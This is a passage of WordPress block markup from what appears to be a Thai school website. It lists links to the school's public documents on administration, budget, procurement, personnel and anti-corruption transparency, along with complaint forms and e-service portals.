-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=drive_link\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https: